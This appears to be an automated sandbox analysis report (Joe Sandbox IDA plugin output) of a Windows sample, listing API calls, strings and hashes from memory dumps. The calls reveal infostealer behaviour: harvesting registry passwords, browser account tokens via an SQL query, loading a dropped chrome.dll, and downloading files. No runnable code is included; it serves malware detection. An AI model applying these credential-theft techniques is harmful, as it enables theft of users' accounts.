                                               • Associated: 00000000.00000002.2287319130.00000000006E8000.00000040.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: lstrcat$Heap$EnumFreeOpenProcessValuememsettask
                                              • String ID: :
                                              • API String ID: 3191641157-3653984579
                                              • Opcode ID: b3130cf40c1dd3c7cf9147a5f31127e01731d4f473a6a07740fc976ddd9062c8
                                              • Instruction ID: 7dd5c8f6c25e89eb5421da9b581f9cff4d94f04832d352fdfe902425259828cd
                                              • Opcode Fuzzy Hash: b3130cf40c1dd3c7cf9147a5f31127e01731d4f473a6a07740fc976ddd9062c8
                                              • Instruction Fuzzy Hash: B73164B1E05114DBDB04EBA0DD55DFE737AAF48305B50411EF102772E0DA38AA85CB96
                                              APIs
                                              • lstrcpy.KERNEL32(?,?), ref: 04851892
                                                • Part of subcall function 048591D7: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 04859202
                                                • Part of subcall function 04859657: StrStrA.SHLWAPI(\nm,00000000,00000000,?,0484A1D8,00000000,006D6E5C,00000000), ref: 04859663
                                              • lstrcpy.KERNEL32(?,00000000), ref: 048518CE
                                                • Part of subcall function 04859657: lstrcpyn.KERNEL32(006D7580,\nm,\nm,?,0484A1D8,00000000,006D6E5C), ref: 04859687
                                                • Part of subcall function 04859657: lstrlen.KERNEL32(00000000,?,0484A1D8,00000000,006D6E5C), ref: 0485969E
                                                • Part of subcall function 04859657: wsprintfA.USER32 ref: 048596BE
                                              • lstrcpy.KERNEL32(?,00000000), ref: 04851916
                                              • lstrcpy.KERNEL32(?,00000000), ref: 0485195E
                                              • lstrcpy.KERNEL32(?,00000000), ref: 048519A5
                                              • lstrcpy.KERNEL32(?,00000000), ref: 048519ED
                                              • lstrcpy.KERNEL32(?,00000000), ref: 04851A35
                                              • lstrcpy.KERNEL32(?,00000000), ref: 04851A7C
                                              • lstrcpy.KERNEL32(?,00000000), ref: 04851AC4
                                                • Part of subcall function 0485AD97: lstrlen.KERNEL32(048451BC,?,?,048451BC,00420DDF), ref: 0485ADA2
                                                • Part of subcall function 0485AD97: lstrcpy.KERNEL32(00420DDF,00000000), ref: 0485ADFC
                                              • strtok_s.MSVCRT ref: 04851C07
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: lstrcpy$lstrlen$FolderPathlstrcpynstrtok_swsprintf
                                              • String ID:
                                              • API String ID: 4276352425-0
                                              • Opcode ID: da86a3651816fd612d9f19635d2e19fbb626f2ddea617614ccf9717b4b52eb80
                                              • Instruction ID: d83667adf359eb98399c8332242f3d9487f58ab87ae473a66dc86e601c923461
                                              • Opcode Fuzzy Hash: da86a3651816fd612d9f19635d2e19fbb626f2ddea617614ccf9717b4b52eb80
                                              • Instruction Fuzzy Hash: 5D7197B5D011189BDB14FB64DC88EEE7379AF54304F044ED9E909E2150EEB56A88CF52
                                              APIs
                                              • memset.MSVCRT ref: 00407374
                                              • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,00407CF0), ref: 0040739A
                                              • RegEnumValueA.ADVAPI32(00407CF0,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00407411
                                              • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0040746D
                                              • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,00407CF0,80000001,00416414,?,?,?,?,?,00407CF0,?), ref: 004074B2
                                              • HeapFree.KERNEL32(00000000,?,?,?,?,00407CF0,80000001,00416414,?,?,?,?,?,00407CF0,?), ref: 004074B9
                                                • Part of subcall function 00409290: vsprintf_s.MSVCRT ref: 004092AB
                                              • task.LIBCPMTD ref: 004075B5
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000000.00000002.2287319130.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2287319130.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2287319130.000000000056E000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2287319130.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2287319130.00000000006E8000.00000040.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Heap$EnumFreeOpenProcessValuememsettaskvsprintf_s
                                              • String ID: Password
                                              • API String ID: 2698061284-3434357891
                                              • Opcode ID: 3a3dd591c7cbb0d90e152054b3ac75d8c6492caf44e892e450b93b3cf6805213
                                              • Instruction ID: 394e2b55a83f95d9b644045a39dee7934e13af239b1baa97d0343fed5997f3db
                                              • Opcode Fuzzy Hash: 3a3dd591c7cbb0d90e152054b3ac75d8c6492caf44e892e450b93b3cf6805213
                                              • Instruction Fuzzy Hash: 43611EB5D041689BDB24DB50CC41BDAB7B8BF54304F0081EAE649A6181EF746FC9CF95
                                              APIs
                                              • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 04857939
                                              • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 04857976
                                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 048579FA
                                              • RtlAllocateHeap.NTDLL(00000000), ref: 04857A01
                                              • wsprintfA.USER32 ref: 04857A37
                                                • Part of subcall function 0485ACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 0485ACFF
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                                              • String ID: :$C$\
                                              • API String ID: 1544550907-3809124531
                                              • Opcode ID: 39db56893d369c74f5f4f3db1860a6a0fb8aa9103e681a18a70390936e9ddc23
                                              • Instruction ID: a39a7d8476efcdbd9c55c5abe58101424eeac0be5ea38d8fc7e6b4cd61e6f6e7
                                              • Opcode Fuzzy Hash: 39db56893d369c74f5f4f3db1860a6a0fb8aa9103e681a18a70390936e9ddc23
                                              • Instruction Fuzzy Hash: EA41C5B1D05258EBDB10DF94CC84BEEBB78AF08704F044599F505A7290E7756B84CBA6
                                              APIs
                                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,02CA5388,00000000,?,00420E14,00000000,?,00000000), ref: 004182C0
                                              • HeapAlloc.KERNEL32(00000000,?,?,?,?,00000000,00000000,?,02CA5388,00000000,?,00420E14,00000000,?,00000000,00000000), ref: 004182C7
                                              • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 004182E8
                                              • __aulldiv.LIBCMT ref: 00418302
                                              • __aulldiv.LIBCMT ref: 00418310
                                              • wsprintfA.USER32 ref: 0041833C
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000000.00000002.2287319130.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2287319130.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2287319130.000000000056E000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2287319130.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2287319130.00000000006E8000.00000040.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Heap__aulldiv$AllocGlobalMemoryProcessStatuswsprintf
                                              • String ID: %d MB$@
                                              • API String ID: 2886426298-3474575989
                                              • Opcode ID: d0391a1658ec30498705cc8c9cee2c4097af9c2ce960180bd43284ebda5957a4
                                              • Instruction ID: 389ef6515a1f2427be64b00d9458de7be2b91b0079cd17c5d853587b1d371e56
                                              • Opcode Fuzzy Hash: d0391a1658ec30498705cc8c9cee2c4097af9c2ce960180bd43284ebda5957a4
                                              • Instruction Fuzzy Hash: 8B214AF1E44218ABDB00DFD5DD49FAEBBB9FB44B04F10450AF615BB280D77969008BA9
                                              APIs
                                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,006D6D60,00000000,?,00420E14,00000000,?,00000000), ref: 04858527
                                              • RtlAllocateHeap.NTDLL(00000000), ref: 0485852E
                                              • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 0485854F
                                              • __aulldiv.LIBCMT ref: 04858569
                                              • __aulldiv.LIBCMT ref: 04858577
                                              • wsprintfA.USER32 ref: 048585A3
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                                              • String ID: @$pkm
                                              • API String ID: 2774356765-1350193380
                                              • Opcode ID: d0391a1658ec30498705cc8c9cee2c4097af9c2ce960180bd43284ebda5957a4
                                              • Instruction ID: 6c870c8f1741534d006e226d5ab3e2339ec1869f1de24ea84792286055ecba30
                                              • Opcode Fuzzy Hash: d0391a1658ec30498705cc8c9cee2c4097af9c2ce960180bd43284ebda5957a4
                                              • Instruction Fuzzy Hash: CA211DB1E44358ABDB00DFD4CC45FAEBBB9FB44B15F10460AFA15BB290D77869008BA5
                                              APIs
                                                • Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6
                                                • Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 0040483A
                                                • Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404851
                                                • Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404868
                                                • Part of subcall function 00404800: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404889
                                                • Part of subcall function 00404800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404899
                                              • InternetOpenA.WININET(00420DFB,00000001,00000000,00000000,00000000), ref: 0040615F
                                              • StrCmpCA.SHLWAPI(?,02C9ED80), ref: 00406197
                                              • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 004061DF
                                              • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00406203
                                              • InternetReadFile.WININET(00412DB1,?,00000400,?), ref: 0040622C
                                              • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0040625A
                                              • CloseHandle.KERNEL32(?,?,00000400), ref: 00406299
                                              • InternetCloseHandle.WININET(00412DB1), ref: 004062A3
                                              • InternetCloseHandle.WININET(00000000), ref: 004062B0
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000000.00000002.2287319130.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2287319130.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2287319130.000000000056E000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2287319130.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2287319130.00000000006E8000.00000040.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Internet$??2@CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                              • String ID:
                                              • API String ID: 4287319946-0
                                              • Opcode ID: 79bb47fcace65dc0c408726790117bb2adccae202de1a5eabfd6db97336226ad
                                              • Instruction ID: 62bae03b9e4771e022f65dfe0b744ca25a6527e7e90d195df508867c32b8ef77
                                              • Opcode Fuzzy Hash: 79bb47fcace65dc0c408726790117bb2adccae202de1a5eabfd6db97336226ad
                                              • Instruction Fuzzy Hash: CD5184B1A01218ABDB20EF90DC45FEE7779AB44305F0041AEF605B71C0DB786A95CF59
                                              APIs
                                                • Part of subcall function 0485AD17: lstrcpy.KERNEL32(?,00000000), ref: 0485AD5D
                                                • Part of subcall function 04844A67: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 04844AA1
                                                • Part of subcall function 04844A67: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 04844AB8
                                                • Part of subcall function 04844A67: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 04844ACF
                                                • Part of subcall function 04844A67: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 04844AF0
                                                • Part of subcall function 04844A67: InternetCrackUrlA.WININET(00000000,00000000), ref: 04844B00
                                              • InternetOpenA.WININET(00420DFB,00000001,00000000,00000000,00000000), ref: 048463C6
                                              • StrCmpCA.SHLWAPI(?,006D6E80), ref: 048463FE
                                              • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 04846446
                                              • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 0484646A
                                              • InternetReadFile.WININET(?,?,00000400,?), ref: 04846493
                                              • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 048464C1
                                              • CloseHandle.KERNEL32(?,?,00000400), ref: 04846500
                                              • InternetCloseHandle.WININET(?), ref: 0484650A
                                              • InternetCloseHandle.WININET(00000000), ref: 04846517
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Internet$??2@CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                              • String ID:
                                              • API String ID: 4287319946-0
                                              • Opcode ID: b1da7730cf3e973672ea3d958da0836ae58ce978cfb0a793029a7ab8af6d853d
                                              • Instruction ID: 159544368e3ebe1d15f4de9c686abdde5c963ec580795fe21372ed12efd4027f
                                              • Opcode Fuzzy Hash: b1da7730cf3e973672ea3d958da0836ae58ce978cfb0a793029a7ab8af6d853d
                                              • Instruction Fuzzy Hash: EA515FB1A0021CABDF24DF94DC44BEE7779AB44305F008699E605F7190EBB8AA85CF95
                                              APIs
                                              • memset.MSVCRT ref: 0485523E
                                                • Part of subcall function 048591D7: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 04859202
                                              • lstrcat.KERNEL32(?,00000000), ref: 04855267
                                              • lstrcat.KERNEL32(?,00420FE8), ref: 04855284
                                                • Part of subcall function 04854DC7: wsprintfA.USER32 ref: 04854DE3
                                                • Part of subcall function 04854DC7: FindFirstFileA.KERNEL32(?,?), ref: 04854DFA
                                              • memset.MSVCRT ref: 048552CA
                                              • lstrcat.KERNEL32(?,00000000), ref: 048552F3
                                              • lstrcat.KERNEL32(?,00421008), ref: 04855310
                                                • Part of subcall function 04854DC7: StrCmpCA.SHLWAPI(?,00420FC4), ref: 04854E28
                                                • Part of subcall function 04854DC7: StrCmpCA.SHLWAPI(?,00420FC8), ref: 04854E3E
                                                • Part of subcall function 04854DC7: FindNextFileA.KERNEL32(000000FF,?), ref: 04855034
                                                • Part of subcall function 04854DC7: FindClose.KERNEL32(000000FF), ref: 04855049
                                              • memset.MSVCRT ref: 04855356
                                              • lstrcat.KERNEL32(?,00000000), ref: 0485537F
                                              • lstrcat.KERNEL32(?,00421020), ref: 0485539C
                                                • Part of subcall function 04854DC7: wsprintfA.USER32 ref: 04854E67
                                                • Part of subcall function 04854DC7: StrCmpCA.SHLWAPI(?,004208D3), ref: 04854E7C
                                                • Part of subcall function 04854DC7: wsprintfA.USER32 ref: 04854E99
                                                • Part of subcall function 04854DC7: PathMatchSpecA.SHLWAPI(?,?), ref: 04854ED5
                                                • Part of subcall function 04854DC7: lstrcat.KERNEL32(?,006D6F24), ref: 04854F01
                                                • Part of subcall function 04854DC7: lstrcat.KERNEL32(?,00420FE0), ref: 04854F13
                                                • Part of subcall function 04854DC7: lstrcat.KERNEL32(?,?), ref: 04854F27
                                                • Part of subcall function 04854DC7: lstrcat.KERNEL32(?,00420FE4), ref: 04854F39
                                                • Part of subcall function 04854DC7: lstrcat.KERNEL32(?,?), ref: 04854F4D
                                                • Part of subcall function 04854DC7: CopyFileA.KERNEL32(?,?,00000001), ref: 04854F63
                                                • Part of subcall function 04854DC7: DeleteFileA.KERNEL32(?), ref: 04854FE8
                                              • memset.MSVCRT ref: 048553E2
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: lstrcat$Filememset$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                              • String ID:
                                              • API String ID: 4017274736-0
                                              • Opcode ID: 526dae8c9c0fde88560bc6a89523ce9510f779cd9e33a96f7e7cea5f911dcca2
                                              • Instruction ID: a2db9b180b375f8b94d7d90b40781a353e35828161d3d2e09fb9196d053ba636
                                              • Opcode Fuzzy Hash: 526dae8c9c0fde88560bc6a89523ce9510f779cd9e33a96f7e7cea5f911dcca2
                                              • Instruction Fuzzy Hash: 7D41E9B5E4032867EB54F770EC4AFDD33385B20705F804A95BA85A50D0EEF867C88B92
                                              APIs
                                              • type_info::operator==.LIBVCRUNTIME ref: 048BF6B4
                                              • ___TypeMatch.LIBVCRUNTIME ref: 048BF7C2
                                              • CatchIt.LIBVCRUNTIME ref: 048BF813
                                              • CallUnexpected.LIBVCRUNTIME ref: 048BF92F
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CallCatchMatchTypeUnexpectedtype_info::operator==
                                              • String ID: csm$csm$csm
                                              • API String ID: 2356445960-393685449
                                              • Opcode ID: 0aa7d8e53ae69f4e65a14af659269dcd6c8d533d9c3592b436de8e99f8465a7b
                                              • Instruction ID: 3c5c9e7c3c8832a199f3e9ac5685a9ecc6d7201da943fc265954935e32782a60
                                              • Opcode Fuzzy Hash: 0aa7d8e53ae69f4e65a14af659269dcd6c8d533d9c3592b436de8e99f8465a7b
                                              • Instruction Fuzzy Hash: C7B15A35900209AFDF15DFA8CC409EEB7B5AF08318B144A59EB90EB311D770EA51DBD2
                                              APIs
                                              • ??_U@YAPAXI@Z.MSVCRT(00064000), ref: 0041735E
                                                • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                              • OpenProcess.KERNEL32(001FFFFF,00000000,0041758D,004205C5), ref: 0041739C
                                              • memset.MSVCRT ref: 004173EA
                                              • ??_V@YAXPAX@Z.MSVCRT(?), ref: 0041753E
                                              Strings
                                              • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 0041740C
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000000.00000002.2287319130.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2287319130.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2287319130.000000000056E000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2287319130.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2287319130.00000000006E8000.00000040.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: OpenProcesslstrcpymemset
                                              • String ID: 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                                              • API String ID: 224852652-4138519520
                                              • Opcode ID: 4eb0c3d19f3da17071fde292eb786f020f2e13f1e01cd1aee6cfe2f08f7ed460
                                              • Instruction ID: 233c3b8a05bec9dd0facad4523d46c30dcb6cb295cabbf2d5ddda9a1061df09f
                                              • Opcode Fuzzy Hash: 4eb0c3d19f3da17071fde292eb786f020f2e13f1e01cd1aee6cfe2f08f7ed460
                                              • Instruction Fuzzy Hash: 24515FB0D04218ABDB14EF91DC45BEEB7B5AF04305F1041AEE21567281EB786AC8CF59
                                              APIs
                                                • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                                • Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
                                                • Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
                                                • Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22
                                                • Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
                                                • Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92
                                                • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                                • Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6
                                                • Part of subcall function 0040A560: memcmp.MSVCRT(?,v20,00000003), ref: 0040A57D
                                              • lstrlenA.KERNEL32(00000000), ref: 0040BC6F
                                                • Part of subcall function 00418FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418FE2
                                              • StrStrA.SHLWAPI(00000000,AccountId), ref: 0040BC9D
                                              • lstrlenA.KERNEL32(00000000), ref: 0040BD75
                                              • lstrlenA.KERNEL32(00000000), ref: 0040BD89
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000000.00000002.2287319130.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2287319130.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2287319130.000000000056E000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2287319130.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2287319130.00000000006E8000.00000040.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: lstrcpy$lstrlen$lstrcat$AllocLocalmemcmp
                                              • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                                              • API String ID: 1440504306-1079375795
                                              • Opcode ID: 07dd89b33e34ea4361fdad8a29fbd65439c590fd4139dac0401408bfbc6ec8f6
                                              • Instruction ID: 6476b4a2e47316619015001d7be3bff7ad81932ea7eb7605c7a9cb508b765a87
                                              • Opcode Fuzzy Hash: 07dd89b33e34ea4361fdad8a29fbd65439c590fd4139dac0401408bfbc6ec8f6
                                              • Instruction Fuzzy Hash: E9B17371A111089BCB04FBA1DCA6EEE7339AF14314F40456FF50673195EF386A98CB6A
                                              APIs
                                              • LoadLibraryA.KERNEL32(C:\ProgramData\chrome.dll,?,004108E4), ref: 0040A098
                                              • GetProcAddress.KERNEL32(00000000,connect_to_websocket), ref: 0040A0BE
                                              • GetProcAddress.KERNEL32(00000000,free_result), ref: 0040A0D5
                                              • FreeLibrary.KERNEL32(00000000,?,004108E4), ref: 0040A0F9
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000000.00000002.2287319130.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2287319130.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2287319130.000000000056E000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2287319130.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2287319130.00000000006E8000.00000040.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: AddressLibraryProc$FreeLoad
                                              • String ID: C:\ProgramData\chrome.dll$connect_to_websocket$free_result
                                              • API String ID: 2256533930-1545816527
                                              • Opcode ID: 7a0dc9a98ac853a9b738e9b56338bc9d7e27e39a5dbcb03120cd0e56dd10277b
                                              • Instruction ID: 41317d004e32df3368e0b40b2df30f060e9b3f1c7a199a11b2b6647de007d5a9
                                              • Opcode Fuzzy Hash: 7a0dc9a98ac853a9b738e9b56338bc9d7e27e39a5dbcb03120cd0e56dd10277b
                                              • Instruction Fuzzy Hash: 57F01DB4E0E324EFD7009B60ED48B563BA6E318341F506437F505AB2E0E3B85494CB6B
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000000.00000002.2287319130.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2287319130.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2287319130.000000000056E000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2287319130.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2287319130.00000000006E8000.00000040.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ExitProcess$DefaultLangUser
                                              • String ID: *
                                              • API String ID: 1494266314-163128923
                                              • Opcode ID: 8ad7487ebdf551ce844e744865076748c7b192adeb82af89cb9554ed9750e1ed
                                              • Instruction ID: 485b87df60e927c5081145715141aeea1c9fd48c6e3f29f258bd7afdae13bdb0
                                              • Opcode Fuzzy Hash: 8ad7487ebdf551ce844e744865076748c7b192adeb82af89cb9554ed9750e1ed
                                              • Instruction Fuzzy Hash: AFF0E232D8E218EFD3409FE0EC0979CFB31EB05707F064296F60996190E6708A80CB52
                                              APIs
                                                • Part of subcall function 04847597: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 04847601
                                                • Part of subcall function 04847597: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 04847678
                                                • Part of subcall function 04847597: StrStrA.SHLWAPI(00000000,0042191C,00000000), ref: 048476D4
                                                • Part of subcall function 04847597: GetProcessHeap.KERNEL32(00000000,?), ref: 04847719
                                                • Part of subcall function 04847597: HeapFree.KERNEL32(00000000), ref: 04847720
                                              • lstrcat.KERNEL32(006D7068,0042192C), ref: 048478CD
                                              • lstrcat.KERNEL32(006D7068,00000000), ref: 0484790F
                                              • lstrcat.KERNEL32(006D7068,00421930), ref: 04847921
                                              • lstrcat.KERNEL32(006D7068,00000000), ref: 04847956
                                              • lstrcat.KERNEL32(006D7068,00421934), ref: 04847967
                                              • lstrcat.KERNEL32(006D7068,00000000), ref: 0484799A
                                              • lstrcat.KERNEL32(006D7068,00421938), ref: 048479B4
                                              • task.LIBCPMTD ref: 048479C2
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
                                              • String ID:
                                              • API String ID: 2677904052-0
                                              • Opcode ID: 754e135dd435b5109bd89d6f633deaab1f2fe0ec03a021116c7625d90a29a748
                                              • Instruction ID: 7f4b196eca927b8791903901c8950e07b87d33f989511adc61c8fd46183a019c
